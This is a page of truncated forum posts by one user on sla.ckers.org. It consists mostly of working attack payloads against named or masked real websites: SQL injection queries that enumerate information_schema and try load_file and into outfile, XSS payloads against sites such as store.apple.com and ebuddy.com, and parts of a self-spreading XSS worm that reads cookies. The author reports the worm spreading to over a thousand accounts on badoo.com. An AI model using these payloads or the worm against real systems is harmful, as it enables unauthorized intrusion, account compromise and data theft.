Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 

Current Page: 1 of 2
Results 1 - 30 of 36
5 years ago
Jiu
"memberid=42 and 1=1-- -&page=1" and "member_id=42 and (select 0x42)>0x41-- -&page=1" doesn't work :S Did you want a mp with the whole url? So Union is in a blackList certainly ^^
Forum: SQL and Code Injection
5 years ago
Jiu
Wow, that was fast :D but if "/*" must be closed, why that works with "group by" and "#" doesn't work?
Forum: SQL and Code Injection
5 years ago
Jiu
So I have the site: http://site.com/page.php?memberid=42&page=1 It's mysql 5 The field memberid is vulnerable to SQL injection: memberid=42 and 1=0 => false memberid=42 and 1=1 => true now the weird thing: memberid=42 and 1=0/* => false memberid=42 and 1=1/* => false memberid=42 and 1=0-- => false memberid=42 and 1=1-- => false memberid=42 and 1=0# =>
Forum: SQL and Code Injection
6 years ago
Jiu
http://store.apple.com/us/search?find=%22%3E%3Cimg%20src=%22.%22%20onerror=%22alert(1)%22%3Cinput without onmouseover ^^ works in Firefox 2
Forum: Full Disclosure
6 years ago
Jiu
"style="-moz-binding:url('//ha.ckers.org/xssmoz.xml%23xss'); Seems that no more works on FF2 :( "style="-moz-binding:url(data:text/xml;charset=utf-7,%2bADw-?xml version='1.0'?%2bAD4APA-bindings xmlns='http://www.mozilla.org/xbl'%2bAD4APA-binding%20id='xss'%2bAD4APA-implementation%2bAD4APA-constructor%2bAD4-alert('XSS');%2bAPA-/constructor%2bAD4APA-/implementation%2bAD4APA-
Forum: Full Disclosure
6 years ago
Jiu
m4x Wrote: ------------------------------------------------------- > I recently found an SQL injection vulnerability on > a site named neopets.com.. > > I have been able to get some output but in a > different kind of way...heres what i have - > > http://www.neopets.com/s/index.phtml?track_cat_id= > -1%20union%20select%201,@@version,3,4,5,6,7&item_i > d=
Forum: SQL and Code Injection
6 years ago
Jiu
You must just try possibility, "union select 1,2,3,4,5,6,7 from table_name". If the neopets appear, that's a good table, else it's not. Use your imagination for the tablename ;) Jiu
Forum: SQL and Code Injection
6 years ago
Jiu
Think it's better to use that 8-) http://www.neopets.com/s/index.phtml?track_cat_id=9%20union%20select%201,2,3,4,5,6,7&item_id=346&track_start_point_id=129 If injection is correct, the neopets appear, else not ^^ But it's mysql 4.x.xx :/ Must bruteforce tablename xD Jiu
Forum: XSS Info
6 years ago
Jiu
Hi I find a vulnerability in ebuddy.com. You can send javascript in img or iframe, but you must encode the code. <img src=. onerror="alert('xss');"> wont work but if you send %3cimg src=. onerror=%27alert(%22xss%22);%27%3e, the javascript will execute http://img442.imageshack.us/my.php?image=proof3go4.jpg So i just wrote that to steal the contact list if(window.XMLHt
Forum: Full Disclosure
6 years ago
Jiu
http://badoo.com var x; b=Math.floor(Math.random()*1000000); if(window.XMLHttpRequest) x = new XMLHttpRequest(); else if(window.ActiveXObject) x = new ActiveXObject("Microsoft.XMLHTTP"); u=document.location; //url l=document.cookie.split(";"); c=l[2].substring(4,36); //cookie p=document.links[6].href; //page t=(document.links[6].href).split(".");
Forum: XSS Info
6 years ago
Jiu
I put this w0rm on the domain (Can i say the site?) i has 1142 friends but a lot wasn't accepted by me (you cant see how many friend request you have -_-) The account was deleted, but that was a fast repanding w0rm (~1.5day) and he always doesnt work on IE ^^
Forum: XSS Info
6 years ago
Jiu
Hi, i just create a w0rm for a domain, but he doesnt work in IE... var x; b=Math.floor(Math.random()*1000000); if(window.XMLHttpRequest) x = new XMLHttpRequest(); else if(window.ActiveXObject) x = new ActiveXObject("Microsoft.XMLHTTP"); u=document.location; l=document.cookie.split(";"); c=l[2].substring(4,36); p=document.links[6].href; t=(document.links[6].hr
Forum: XSS Info
6 years ago
Jiu
ch.tillate.com (dunno if that works on other country) send message Title: ')" onmouseover=alert(1); o Works on firefox, didn't try on IE ^^
Forum: Full Disclosure
6 years ago
Jiu
Thx for your response ^^ @sirdarcat: Yeah IE sucks, but a lot of people use it :/ @gareth: Seems that doesn't work correctly :/ When i have éééàààèèè, i obtain -> ÿfdÿfdÿfdÿfdÿfdÿfdÿfdÿfdÿfd, but it's certainly how i receive the information... When i alert what i receive, that puts a "?" for all non ascii characters... ^^ and when i escape that that give me for
Forum: XSS Info
6 years ago
Jiu
Hi all, i just created a w0rm for a little website. I've just a little problem with those characters (é,à,è,...). If there is one of these characters in the "hobbies" or in "me", the POST doesn't work. Normally, with escape, that will work, no? Here is the code (it's my first w0rm, surely a lot of errors =D) var x; var temp; var temp2; if(window.XMLHttpRequest) // F
Forum: XSS Info
6 years ago
Jiu
Same question ^^ Can you inject some code in an error like that: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-5,5' at line 1 When you change the number of the &page="a negative number", that changes the "-5" in the sql error ^^ thx Jiu
Forum: SQL and Code Injection
7 years ago
Jiu
No output :S i retry that SELECT null,null,is_grantable,null FROM information_schema.user_privileges WHERE privilege_type = CONCAT(Char(102),Char(105),Char(108),Char(101)) LIMIT 1 But always no output :S dunno why xD Perhaps you cant use concat with 'file', must use quote ^^' Jiu
Forum: SQL and Code Injection
7 years ago
Jiu
As you say i try that: hxxp://www.***.com/***.php?id=24 and 1=0 UNION SELECT null,null,is_grantable,null FROM information_schema.user_privileges WHERE privilege_type = CONCAT(Char(102),Char(105),Char(108),Char(101)) But nothing appears (i try with limit 1 too) so perhaps it's normal.. i try hxxp://www.***.com/***.php?id=24 and 1=0 UNION SELECT null,null,is_grantable,null FROM information_
Forum: SQL and Code Injection
7 years ago
Jiu
Yes its that i try xD Just copy false ^^ And that give me: NO ^^
Forum: SQL and Code Injection
7 years ago
Jiu
hxxp://www.***.com/***.php?id=24 and 1=0 UNION SELECT null,null,grantee,null FROM information_schema.user_privileges LIMIT 1 that give me 3 output 'username'@'%' then i do hxxp://www.***.com/***.php?id=24 and 1=0 UNION SELECT null,null,is_grandable,null FROM information_schema.user_privileges LIMIT 1 response: NO XD So i think that no say that i havent file privilege ^^' All that i
Forum: SQL and Code Injection
7 years ago
Jiu
hxxp://www.***.com/***.php?id=24 and 1=0 UNION SELECT null,grantee,is_grantable,null FROM information_schema.user_privileges WHERE privilege_type = CONCAT(Char(102),Char(105),Char(108),Char(101)) AND grantee like CONCAT(Char(102),Char(114),Char(111),Char(110),Char(116),Char(110),Char(97),Char(116),Char(102),Char(110)) response doesn't appear at the place where there is normally the information
Forum: SQL and Code Injection
7 years ago
Jiu
So how can i know if i have file privilege? ^^ Your article are nice and learn good how to inject code ^^ Jiu
Forum: SQL and Code Injection
7 years ago
Jiu
hxxp://www.xxx.com/xxx.php?id=24 and 1=0 union select null,null,file_priv,null FROM mysql.user WHERE user = CONCAT(Char(),Char(),...)-- (The username of server in the CONCAT) I obtain: SELECT command denied to user 'username'@'server' for table 'user' so i think that i dont have file privilege? :( Jiu
Forum: SQL and Code Injection
7 years ago
Jiu
Ok i try that hxxp://www.***.com/***.php?id=24 and 1=0 union select null,null,load_file(CONCAT(/../../../../file.txt)),null-- seems that doesnt work (perhaps wrong syntax)(doesnt display anything) and when i try hxxp://www.***.com/***.php?id=24 and 1=0 union select * from accueil into outfile(CONCAT(hxxp://mysite.com/file.txt)) that do: You have an error in your SQL syntax; check
Forum: SQL and Code Injection
7 years ago
Jiu
So When i have table and column, what i can do? There is no user table and no password ^^' And like you said, i cant update :p Jiu
Forum: SQL and Code Injection
7 years ago
Jiu
In java, when you cast a char with int, that gives you the number of the char ^^ So that works (i obtain same result that mario) :) And to simplify things i do that import java.util.Scanner; public class test { private static Scanner scanner = new Scanner(System.in); public static void main(String[] args) { System.out.print("Enter a String: "); String t = scanner.next
Forum: SQL and Code Injection
7 years ago
Jiu
Think it doesnt work or i dont use it correctly I just create this javacode ^^ import java.util.Scanner; public class test { private static Scanner scanner = new Scanner(System.in); public static void main(String[] args) { System.out.print("Enter a String: "); String t = scanner.next(); char [] ch = t.toCharArray(); for(int i=0;i<ch.length;i++){ System.out
Forum: SQL and Code Injection
7 years ago
Jiu
Ok thx, that works ^^ hxxp://www.***.com/***.php?id=24 and 0=1 union select null,null,column_name,null from information_schema.columns where table_name = CONCAT(Char(97),Char(99),Char(99),Char(117),Char(101),Char(105),Char(108)) Limit 0,1 I obtain the column from the table "accueil" :) Now if you have a website who convert a String in a sequence of Char(), i take :p Jiu
Forum: SQL and Code Injection
7 years ago
Jiu
Yeah i know for the tablename, just say that because i have try with a lot of table... But I dont have access to quote and double quote and without quote, that give me Unknown column 'thetablename' in 'where clause' So i ask you if i can use concat ? ^^ Jiu
Forum: SQL and Code Injection
7 years ago
Jiu
To find table and column i do what do you say: hxxp://www.***.com/***.php?id=24 AND 1=0 UNION SELECT 111,222,table_name,444 FROM information_schema.tables LIMIT 1,1 the table_name was in the title and i just change the limit like LIMIT 2,1 => LIMIT 3,1 (i begin at 15, because the first table are already define by MySQL) Same for column but with hxxp://www.***.com/***.php?id=24 AND 1=0 U
Forum: SQL and Code Injection